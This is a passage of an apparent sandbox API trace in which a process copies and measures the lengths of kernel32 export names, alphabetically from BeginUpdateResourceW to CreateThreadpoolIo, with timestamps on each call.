lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.709] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.709] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.709] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.709] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.709] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.709] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.709] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.709] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.709] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.709] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.709] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.709] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.709] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.709] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.709] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.709] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.709] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.710] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.710] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.710] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.710] lstrlenA (lpString="CANCELIO") returned 8 [0084.710] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.710] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.710] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.710] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.710] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.710] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.710] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.710] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.710] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.710] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.710] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.710] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.710] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.710] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.710] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.710] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.710] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.710] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.710] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.710] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.710] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.710] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.710] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.710] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.710] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.710] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.710] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.710] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.710] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.710] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.710] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.710] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.710] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.711] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.711] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.711] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.711] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.711] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.711] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.711] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.711] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.711] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.711] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.711] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.711] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.711] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.711] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.711] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.711] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.711] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.711] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.711] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.711] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.711] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.711] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.711] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.711] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.711] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.711] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.711] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.711] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.711] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.711] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.711] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.711] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.711] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.711] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.711] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.711] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.712] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.712] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.712] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.712] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.712] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.712] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.712] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.712] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.712] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.712] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.712] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.712] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.712] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.712] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.712] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.712] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.712] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.712] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.712] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.712] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.712] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.712] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.712] lstrlenA (lpString="COPYFILEA") returned 9 [0084.712] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.712] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.712] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.712] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.712] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.712] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.712] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.712] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.712] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.712] lstrlenA (lpString="COPYFILEW") returned 9 [0084.712] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.712] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.712] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.713] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.713] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.713] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.713] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.713] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.713] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.713] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.713] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.713] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.713] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.713] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.713] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.713] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.713] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.713] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.713] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.713] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.713] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.713] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.713] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.713] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.713] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.713] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.713] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.713] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.713] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.713] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.713] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.713] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.713] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.713] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.713] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.713] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.713] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.713] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.713] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.714] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.714] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.714] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.714] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.714] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.714] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.714] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.714] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.714] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.714] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.714] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.714] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.714] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.714] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.714] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.714] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.714] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.714] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.714] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.714] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.714] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.714] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.714] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.714] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.714] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.714] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.714] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.714] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.714] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.714] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.714] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.714] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.714] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.714] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.714] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.714] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.715] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.715] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.715] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.715] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.715] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.715] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.715] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.715] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.715] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.715] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.715] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.715] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.715] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.715] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.715] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.715] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.715] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.715] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.715] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.715] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.715] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.715] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.715] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.715] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.715] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.715] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.715] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.715] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.715] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.715] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.715] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.715] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.715] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.715] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.715] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.715] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.716] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.716] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.716] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.716] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.716] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.716] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.716] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.716] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.716] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.716] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.716] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.716] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.716] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.716] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.716] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.716] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.716] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.716] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.716] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.716] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.716] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.716] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.716] lstrlenA (lpString="CREATETHREADPOOLIO") 